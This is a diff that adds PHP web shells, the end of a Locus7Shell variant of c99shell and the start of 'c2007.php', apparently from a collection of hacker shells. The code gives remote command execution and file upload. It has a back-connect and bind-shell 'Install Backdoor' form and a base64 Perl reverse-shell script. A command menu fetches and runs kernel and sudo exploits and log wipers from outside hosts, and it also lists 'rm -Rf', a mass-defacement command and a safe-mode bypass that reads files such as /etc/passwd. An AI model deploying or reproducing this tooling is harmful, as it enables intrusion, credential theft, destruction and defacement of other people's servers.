+"NKCKUDMyNTg3Agg2S5eqUEpJDgcDCAxMT06hgk26vAwUFUhDtYpCuwZByBMRRMyCRwMGRkUg0xIf". 
+"1lAeBiEAGRgXEg0t4SwroCYlDRAn4SmpKCoQJC/hqVAuNGzg8E9RKBEjYBS0JShGh4UMoYASBiUQ". 
+"ADs=", 
+"ext_log"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAMDAwICAgICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARQEKEwK6UyBzC475gEAltJklLRAWzbClRhrK4Ly5yg7/wN". 
+"zLUaLGBQBV2EgFLV4xEOSSWt9gQQBpRpqxoVNaPKkFb5Eh/LmUGzF5qE3+EMIgIAOw==", 
+"ext_php"=> 
+"R0lGODlhEAAQAAAAACH5BAEAAAEALAAAAAAQABAAgAAAAAAAAAImDA6hy5rW0HGosffsdTpqvFlg". 
+"t0hkyZ3Q6qloZ7JimomVEb+uXAAAOw==", 
+"ext_pl"=> 
+"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo". 
+"GLrc3gOAMYR4OOudreegRlBWSJ1lqK5s64LjWF3cQMjpJpDf6//ABAA7", 
+"ext_swf"=> 
+"R0lGODlhFAAUAMQRAP+cnP9SUs4AAP+cAP/OAIQAAP9jAM5jnM6cY86cnKXO98bexpwAAP8xAP/O". 
+"nAAAAP///////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABEALAAAAAAUABQAAAV7YCSOZGme6PmsbMuqUCzP0APLzhAbuPnQAweE52g0fDKCMGgoOm4QB4GA". 
+"GBgaT2gMQYgVjUfST3YoFGKBRgBqPjgYDEFxXRpDGEIA4xAQQNR1NHoMEAACABFhIz8rCncMAGgC". 
+"NysLkDOTSCsJNDJanTUqLqM2KaanqBEhADs=", 
+"ext_tar"=> 
+"R0lGODlhEAAQAGYAACH5BAEAAEsALAAAAAAQABAAhgAAABlOAFgdAFAAAIYCUwA8ZwA8Z9DY4JIC". 
+"Wv///wCIWBE2AAAyUJicqISHl4CAAPD4/+Dg8PX6/5OXpL7H0+/2/aGmsTIyMtTc5P//sfL5/8XF". 
+"HgBYpwBUlgBWn1BQAG8aIABQhRbfmwDckv+H11nouELlrizipf+V3nPA/40CUzmm/wA4XhVDAAGD". 
+"UyWd/0it/1u1/3NzAP950P990mO5/7v14YzvzXLrwoXI/5vS/7Dk/wBXov9syvRjwOhatQCHV17p". 
+"uo0GUQBWnP++8Lm5AP+j5QBUlACKWgA4bjJQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAeegAKCg4SFSxYNEw4gMgSOj48DFAcHEUIZREYoJDQzPT4/AwcQCQkg". 
+"GwipqqkqAxIaFRgXDwO1trcAubq7vIeJDiwhBcPExAyTlSEZOzo5KTUxMCsvDKOlSRscHDweHkMd". 
+"HUcMr7GzBufo6Ay87Lu+ii0fAfP09AvIER8ZNjc4QSUmTogYscBaAiVFkChYyBCIiwXkZD2oR3FB". 
+"u4tLAgEAOw==", 
+"ext_txt"=> 
+"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ". 
+"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7". 
+"UpPWG3Ig6Hq/XmRjuZwkAAA7", 
+"ext_wri"=> 
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao". 
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=", 
+"ext_xml"=> 
+"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA". 
+"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx". 
+"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ". 
+"IQA7" 
+ ); 
+ //For simple size- and speed-optimization. 
+ $imgequals = array( 
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), 
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), 
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), 
+  "ext_html"=>array("ext_html","ext_htm"), 
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), 
+  "ext_lnk"=>array("ext_lnk","ext_url"), 
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"), 
+  "ext_doc"=>array("ext_doc","ext_dot"), 
+  "ext_js"=>array("ext_js","ext_vbs"), 
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), 
+  "ext_wri"=>array("ext_wri","ext_rtf"), 
+  "ext_swf"=>array("ext_swf","ext_fla"), 
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), 
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") 
+ ); 
+ if (!$getall) 
+ { 
+  header("Content-type: image/gif"); 
+  header("Cache-control: public"); 
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); 
+  header("Cache-control: max-age=".(60*60*24*7)); 
+  header("Last-Modified: ".date("r",filemtime(__FILE__))); 
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} 
+  if (empty($images[$img])) {$img = "small_unk";} 
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";} 
+  echo base64_decode($images[$img]); 
+ } 
+ else 
+ { 
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}} 
+  natsort($images); 
+  $k = array_keys($images); 
+  echo  "<center>"; 
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";} 
+  echo "</center>"; 
+ } 
+ exit; 
+} 
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";} 
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<center><b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br></center>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<center><b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+echo("</center>");
+} ?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td width="100%" height="1" valign="top" colspan="2"></td></tr> 
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE> 
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Useful Commands  
+    </div> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+        <input type=hidden name=act value="cmd"> 
+        <input type=hidden name="d" value="<?php echo $dispd; ?>"> 
+          <SELECT NAME="cmd"> 
+            <OPTION VALUE="uname -a">Kernel version 
+              <OPTION VALUE="w">Logged in users 
+                <OPTION VALUE="lastlog">Last to connect 
+                  <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins 
+                    <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD! 
+                    <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/? 
+                    <OPTION VALUE="which wget curl w3m lynx">Downloaders? 
+                    <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO 
+                    <OPTION VALUE="netstat -atup | grep IST">Open ports 
+                    <OPTION VALUE="locate gcc">gcc installed? 
+                    <OPTION VALUE="rm -Rf">Format box (DANGEROUS) 
+                    <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed) 
+                    <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2 
+                    <OPTION VALUE="./zap2">WIPELOGS PT3 
+                    <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed) 
+                    <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1) 
+                    <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2) 
+                    <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3) 
+                    <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4) 
+                    <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5) 
+                    <OPTION VALUE="wget http://precision-gaming.com/sudo.c">wget Linux sudo stack overflow
+                    <OPTION VALUE="gcc sudo.c -o sudosploit">Compile Linux sudo sploit
+                    <OPTION VALUE="./sudosploit">Execute Sudosploit
+                    <OPTION VALUE="wget http://twofaced.org/linux2-6-all.c">Linux Kernel 2.6.* rootkit.c
+                    <OPTION VALUE="gcc linux2-6-all.c -o linuxkernel">Compile Linux2-6-all.c
+                    <OPTION VALUE="./linuxkernel">Run Linux2-6-all.c
+                    <OPTION VALUE="wget http://twofaced.org/mig-logcleaner.c">Mig LogCleaner
+                    <OPTION VALUE="gcc -DLINUX -WALL mig-logcleaner.c -o migl">Compile Mig LogCleaner
+                    <OPTION VALUE="./migl -u root 0">Compile Mig LogCleaner
+                    <OPTION VALUE="sed -i -e 's/<html>/<div style=\'position\:absolute\;width\:2000px\;height\:2000px\;background-color\:black\'><br><br><br><br>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<img src=\'http://img244.imageshack.us/img244/6663/locus7sgm8.jpg\'><br><font size=\'10\' color=\'green\'>&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;&nbsp\;<font size=\'10\' color=\'green\'>HACKED BY <a href=\'http\:\/\/locus7s.com\'>LOCUS7S<\/a><\/font><\/div><meta http-equiv=\'refresh\' content=\'5\\;url=http\:\/\/locus7s.com\'>/g' index.*">index.* Mass Defacement
+                  </SELECT> 
+        <input type=hidden name="cmd_txt" value="1"> 
+        &nbsp; 
+        <input type=submit name=submit value="Execute"> 
+          <br> 
+        Warning. Kernel may be alerted using higher levels </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Kernel Info: <form name="form1" method="post" action="http://google.com/search"> 
+      <input name="q" type="text" id="q" size="80" value="<?php echo wordwrap(php_uname()); ?>"> 
+      <input type="hidden" name="client" value="firefox-a"> 
+      <input type="hidden" name="rls" value="org.mozilla:en-US:official"> 
+      <input type="hidden" name="hl" value="en"> 
+      <input type="hidden" name="hs" value="b7p"> 
+      <input type=submit name="btnG" VALUE="Search"> 
+    </form></center> 
+    </td> 
+</tr></TABLE><br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="116" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr><td height="1" valign="top" colspan="2"></td></tr> 
+<tr> 
+  <td width="50%" height="83" valign="top"><center> 
+    <div align="center">Php Safe-Mode Bypass (Read Files) 
+    </div><br> 
+    <form action="<?php echo $surl; ?>"> 
+      <div align="center"> 
+      File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br> 
+       
+       
+       
+            
+       
+       
+      <? 
+       
+      function rsg_read()
+    {    
+    $test="";
+    $temp=tempnam($test, "cx");
+    $file=$_GET['file'];    
+    $get=htmlspecialchars($file);
+    echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
+    if(copy("compress.zlib://".$file, $temp)){
+    $fichier = fopen($temp, "r");
+    $action = fread($fichier, filesize($temp));
+    fclose($fichier);
+    $source=htmlspecialchars($action);
+    echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
+    unlink($temp);
+    } else {
+    die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+    <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
+    access.</CENTER></FONT>");
+            }
+    echo "</div>";
+    } 
+     
+    if(isset($_GET['file']))
+{
+rsg_read();
+} 
+     
+    ?> 
+     
+    <? 
+     
+    function rsg_glob()
+{
+$chemin=$_GET['directory'];
+$files = glob("$chemin*");
+echo "Trying To List Folder <font color=#000099><b>$chemin</b></font><br>";
+foreach ($files as $filename) {
+    echo "<pre>";
+   echo "$filename\n";
+   echo "</pre>";
+}
+} 
+
+if(isset($_GET['directory']))
+{
+rsg_glob();
+} 
+
+?> 
+
+          <br> 
+      </div> 
+    </form> 
+    </td> 
+  <td width="50%" height="83" valign="top"><center> 
+   <center>Php Safe-Mode Bypass (List Directories):     <form action="<?php echo $surl; ?>"> 
+      <div align="center"><br> 
+      Dir: <input type="text" name="directory" method="get"> <input type="submit" value="List Directory"><br><br> eg: /etc/<br> 
+
+    </form></center> 
+    </td> 
+</tr></TABLE> 
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+<br> 
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1> 
+<tr> 
+ <td width="50%" height="1" valign="top"><center>Search<form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td> 
+ <td width="50%" height="1" valign="top"><center>Upload<form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td> 
+</tr> 
+</table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Make Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center>Make File<form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center>Go Dir<form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center>Go File<form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table> 
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ x2300 Locus7Shell v. <?php echo $shver; ?> <a href="http://www.locus7s.com/"><u><b>Modded by</b></u></a> #!physx^  | <a href="http://www.locus7s.com">www.LOCUS7S.com</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table> 
+</body></html><?php chdir($lastdir); c99shexit(); ?> 
\ No newline at end of file
diff --git a/xakep-shells/PHP/c2007.php.php.txt b/xakep-shells/PHP/c2007.php.php.txt
new file mode 100644
index 0000000..75e5725
--- /dev/null
+++ b/xakep-shells/PHP/c2007.php.php.txt
@@ -0,0 +1,3299 @@
+<?php 
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.0 pre-release build #16"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; 
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server 
+$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>C99 Modified By Psych0 </b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ "html"=>array("html","htm","shtml"), 
+ "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), 
+ "exe"=>array("sh","install","bat","cmd"), 
+ "ini"=>array("ini","inf"), 
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), 
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), 
+ "sdb"=>array("sdb"), 
+ "phpsess"=>array("sess"), 
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") 
+); 
+
+// Registered executable file-types. 
+//  array( 
+//   string "command{i}"=>array("ext1","ext2","ext3",...), 
+//   ... 
+//  ) 
+//   {command}: %f% = filename 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} 
+$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); 
+if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} 
+$dizin = str_replace("\\\\","\\",$dizin); 
+$dizinispd = htmlspecialchars($dizin); 
+/*dizin*/ 
+$real = realpath($dizinispd); 
+$path = basename ($PHP_SELF); 
+function dosyayicek($link,$file) 
+{ 
+   $fp = @fopen($link,"r"); 
+   while(!feof($fp)) 
+   { 
+       $cont.= fread($fp,1024); 
+   } 
+   fclose($fp); 
+
+   $fp2 = @fopen($file,"w"); 
+   fwrite($fp2,$cont); 
+   fclose($fp2); 
+} 
+
+
+
+
+$exeftypes  = array( 
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"), 
+ "perl %f%" => array("pl","cgi") 
+); 
+
+/* Highlighted files. 
+  array( 
+   i=>array({regexp},{type},{opentag},{closetag},{break}) 
+   ... 
+  ) 
+  string {regexp} - regular exp. 
+  int {type}: 
+0 - files and folders (as default), 
+1 - files only, 2 - folders only 
+  string {opentag} - open html-tag, e.g. "<b>" (default) 
+  string {closetag} - close html-tag, e.g. "</b>" (default) 
+  bool {break} - if TRUE and found match then break 
+*/ 
+$regxp_highlight  = array( 
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example 
+  array("config.php",1) // example 
+); 
+
+$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. 
+ // array (i=>{letter} ...); string {letter} - letter of a drive 
+//$safemode_diskettes = range("a","z"); 
+$hexdump_lines = 8;// lines in hex preview file 
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line 
+
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd 
+
+$bindport_pass = "c99";  // default password for binding 
+$bindport_port = "31373"; // default port for binding 
+$bc_port = "31373"; // default port for back-connect 
+$datapipe_localport = "8081"; // default port for datapipe 
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj 
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR 
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT 
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI 
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi 
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl 
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+
+// Command-aliases 
+if (!$win) 
+{ 
+ $cmdaliases = array( 
+  array("-----------------------------------------------------------", "ls -la"), 
+  array("find all suid files", "find / -type f -perm -04000 -ls"), 
+  array("find suid files in current dir", "find . -type f -perm -04000 -ls"), 
+  array("find all sgid files", "find / -type f -perm -02000 -ls"), 
+  array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), 
+  array("find config.inc.php files", "find / -type f -name config.inc.php"), 
+  array("find config* files", "find / -type f -name \"config*\""), 
+  array("find config* files in current dir", "find . -type f -name \"config*\""), 
